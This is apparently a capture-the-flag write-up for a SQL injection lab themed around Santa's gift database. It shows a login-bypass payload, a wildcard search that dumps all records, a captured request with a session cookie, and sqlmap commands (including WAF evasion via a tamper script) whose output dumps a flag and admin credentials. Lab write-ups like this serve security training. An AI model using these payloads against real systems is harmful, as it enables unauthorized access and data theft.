Task Overview

After last year's attack, Santa and the security team have worked hard on reviving Santa's personal portal. Hence, 'Santa's forum 2' went live.

After the attack, logs have revealed that someone has found Santa's panel on the website and logged into his account! After doing so, they were able to dump the whole gift list database, getting all the 2020 gifts in their hands. An attacker has threatened to publish a wishlist.txt file, containing all information, but happily, for us, he was caught by the CBI (Christmas Bureau of Investigation) before that. On MACHINE_IP:8000 you'll find the copy of the website and your goal is to replicate the attacker's actions by dumping the gift list!

Task created by Swafox

So this room is a primer on SQLi / SQL Injection

Useful Resources

Codecademy some good SQL resources. There is also a good SQL Injection room on TryHackMe that I recommend.

Room Resources


Ok, so reading the above we need to take note that the webpage is going to be on 8000 and not 80


Without using directory brute forcing, what's Santa's secret login panel?

Reading the start of the task we see ... found Santa's panel

So let's try that....

Success we have a login page

Visit Santa's secret login panel and bypass the login using SQLi

Using ' or 1=1 -- - we can bypass the login.

How many entries are there in the gift database?

We can use % in the search box to pull back all the results... This works because % is used as a wildcard in SQL much like * in operating system commands.

What did Paul ask for?

From the results generated from the above, you can find what Paul asked for.

What is the flag?

Being lazy, I capture the below request in Burp

GET /santapanel?search=%25 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session=eyJhdXRoIjp0cnVlfQ.X8vIbA.Cx-CZISxA62DKpjM2YiAPpvVOeU
Upgrade-Insecure-Requests: 1

And then run it through sqlmap

$ sqlmap -r request --dbms=mysql --level 5 --risk 3 --dump
 ___ ___[(]_____ ___ ___  {1.4.11#stable}                                                                                    
|_ -| . [)]     | .'| . |                                                                                                    
|___|_  [']_|_|_|__,|  _|                                                                                                    
      |_|V...       |_|                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:57:30 /2020-12-05/

[17:57:30] [INFO] parsing HTTP request from 'request'
[17:57:30] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: search (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=%' AND 2311=2311-- AwTF
[17:57:30] [INFO] testing MySQL
[17:57:30] [WARNING] the back-end DBMS is not MySQL
[17:57:30] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system

[*] ending @ 17:57:30 /2020-12-05/

At this point I hit a brick wall until I went back and read the task fully.

Visit the vulnerable application in Firefox, find Santa's secret login panel and bypass the login. Use some of the commands and tools covered throughout today's task to answer Questions #3 to #6.
Santa reads some documentation that he wrote when setting up the application, it reads:
Santa's TODO: Look at alternative database systems that are better than sqlite. Also, don't forget that you installed a Web Application Firewall (WAF) after last year's attack. In case you've forgotten the command, you can tell SQLMap to try and bypass the WAF by using --tamper=space2comment

Another reminder that I should read stuff fully before jumping in th depend. ANy way lets fix up our sqlmap command and rerun it.

$ sqlmap --dbms sqlite -r request --tamper=space2comment --dump all

Watch the output crawl past we see the flag is

[18:11:13] [INFO] retrieved: CREATE TABLE hidden_table (flag text)
[18:11:29] [INFO] fetching entries for table 'hidden_table' in database 'SQLite_masterdb'
[18:11:29] [INFO] fetching number of entries for table 'hidden_table' in database 'SQLite_masterdb'
[18:11:29] [INFO] retrieved: 1
[18:11:29] [INFO] retrieved: thmfox{[REDACTED]}
Database: SQLite_masterdb
Table: hidden_table
[1 entry]
| flag                                    |
| thmfox{[REDACTED]} |

What is admin's password?

At the end of our output for sqlmap we see the admin username and password dumped out.

[18:15:10] [INFO] retrieved: CREATE TABLE users (username text, password text)
[18:15:26] [INFO] fetching entries for table 'users' in database 'SQLite_masterdb'
[18:15:26] [INFO] fetching number of entries for table 'users' in database 'SQLite_masterdb'
[18:15:26] [INFO] retrieved: 1
[18:15:26] [INFO] retrieved: [REDACTED]
[18:15:31] [INFO] retrieved: admin
Database: SQLite_masterdb
Table: users
[1 entry]
| password         | username |
| [REDACTED]       | admin    |

Done! Day5 completed, onto day 6!